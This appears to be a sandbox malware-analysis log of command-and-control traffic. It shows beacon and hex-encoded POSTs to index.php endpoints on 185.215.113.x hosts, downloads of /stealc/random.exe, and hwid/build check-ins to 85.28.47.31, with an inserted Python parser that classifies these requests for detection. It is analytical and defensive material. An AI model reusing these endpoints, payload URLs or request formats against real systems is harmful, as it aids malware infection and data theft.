Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFIHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 41 43 44 37 44 43 45 35 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="hwid"F6ACD7DCE5231817704571------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="build"sila------HJKKFIJKFCAKJJJKJKFI--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: the four POST requests above repeat in the same alternation for the rest of the capture: each index.php endpoint (185.215.113.19 /Vi9leo/index.php and 185.215.113.16 /Jo89Ku7d/index.php) receives a 4-byte st=s status poll followed by a 160-byte r=<hex> request, with byte-identical bodies every time; the identical repeated entries are not listed again here.
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFCAFCBKFHJJJKKFHIHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 41 43 44 37 44 43 45 35 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 2d 2d 0d 0a Data Ascii: ------BAAFCAFCBKFHJJJKKFHIContent-Disposition: form-data; name="hwid"F6ACD7DCE5231817704571------BAAFCAFCBKFHJJJKKFHIContent-Disposition: form-data; name="build"sila------BAAFCAFCBKFHJJJKKFHI--
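The three request shapes logged above (the 4-byte st=s poll, the 160-byte r=<hex> request and the multipart hwid/build check-in) as an added example that is not part of the report and is not code from any of the detected families: a small parser that rebuilds each request from the report's Data Raw / Data Ascii columns, checks the declared Content-Length against the body actually sent, decodes the multipart form and classifies the request. The raw bytes are reconstructed from the report; header order and CRLF placement are assumptions, because the report prints the headers run together on one line, and the classification labels are this example's own names, not the sandbox's signature names.

```python
"""Parse and classify the C2 requests logged in this report.

Added example, not code from the report or from any detected malware family.
Request bytes are reconstructed from the report's "Data Raw" / "Data Ascii"
columns; header order and CRLF placement are assumptions (the report prints
headers run together). Classification labels are this example's own.
"""
import re

# --- Samples reconstructed from the report ----------------------------------
AMADEY_STATUS = (
    b"POST /Vi9leo/index.php HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: 185.215.113.19\r\n"
    b"Content-Length: 4\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"st=s"
)

# 158 hex characters after "r=", hence the declared Content-Length of 160.
HEX_BLOB = (
    b"B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D"
    b"46450FC9DDF642E3BDD70A7DB72876B85182D12FC761BA3BB365FF574331E4286779BA"
    b"E453974299C0BE55B4"
)
AMADEY_REQUEST = (
    b"POST /Vi9leo/index.php HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: 185.215.113.19\r\n"
    b"Content-Length: 160\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"r=" + HEX_BLOB
)

PANEL_GET = (
    b"GET / HTTP/1.1\r\n"
    b"Host: 85.28.47.31\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)

BOUNDARY = b"----BAAFCAFCBKFHJJJKKFHI"  # value from the Content-Type header
MULTIPART_BODY = b"".join([              # body delimiter is "--" + boundary (RFC 2046)
    b"--" + BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n',
    b"F6ACD7DCE5231817704571\r\n",
    b"--" + BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="build"\r\n\r\n',
    b"sila\r\n",
    b"--" + BOUNDARY + b"--\r\n",
])
HWID_CHECKIN = (
    b"POST /5499d72b3a3e55be.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n"
    b"Host: 85.28.47.31\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n" + MULTIPART_BODY
)

# --- Parsing ----------------------------------------------------------------
def decode_data_raw(hex_column: str) -> bytes:
    """Turn the report's space-separated 'Data Raw' hex column back into bytes."""
    return bytes.fromhex(hex_column)


def parse_request(raw: bytes) -> dict:
    """Split one HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, version = lines[0].decode().split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode().partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def content_length_consistent(req: dict) -> bool:
    """True when the declared Content-Length matches the bytes actually sent."""
    declared = req["headers"].get("content-length")
    if declared is None:
        return len(req["body"]) == 0
    return int(declared) == len(req["body"])


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Return {field name: value bytes} for a multipart/form-data body."""
    fields = {}
    for part in body.split(b"--" + boundary):
        part = part.strip(b"\r\n")
        if not part or part.startswith(b"--"):   # preamble or the closing "--" marker
            continue
        part_headers, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', part_headers)
        if m:
            fields[m.group(1).decode()] = value
    return fields


HEX_PHP_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")   # e.g. /5499d72b3a3e55be.php


def classify(req: dict) -> str:
    """Name the request shape; labels are this example's own, not sandbox signatures."""
    ctype = req["headers"].get("content-type", "")
    body = req["body"]
    if req["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        if req["path"].endswith("/index.php") and body == b"st=s":
            return "status_beacon"                # 4-byte 'st=s' poll
        if req["path"].endswith("/index.php") and re.fullmatch(rb"r=(?:[0-9A-F]{2})+", body):
            return "hex_request"                  # 'r=' + even-length upper-case hex
    if req["method"] == "POST" and ctype.startswith("multipart/form-data"):
        m = re.search(r"boundary=([^;]+)", ctype)
        fields = parse_multipart(body, m.group(1).encode()) if m else {}
        if {"hwid", "build"} <= fields.keys() and HEX_PHP_PATH.match(req["path"]):
            return "multipart_hwid_checkin"
    return "unknown"


def triage(raw: bytes) -> dict:
    """One verdict per request: where it went, what it looks like, honest framing or not."""
    req = parse_request(raw)
    return {"host": req["headers"].get("host"), "path": req["path"],
            "kind": classify(req), "length_ok": content_length_consistent(req)}


if __name__ == "__main__":
    for sample in (AMADEY_STATUS, AMADEY_REQUEST, PANEL_GET, HWID_CHECKIN):
        print(triage(sample))
```

The Content-Length check is worth keeping in any replay or decoder tooling: all three bodies here are framed honestly (4, 160 and 211 bytes), and a mismatch is the first sign that a capture was truncated or that a decoder is counting the wrong thing, as happens easily with the multipart body, whose delimiter lines carry two more dashes than the boundary value in the header.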
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 41 43 44 37 44 43 45 35 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="hwid"F6ACD7DCE5231817704571------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="build"sila------EGDBFIIECBGDGDGDHCAK--
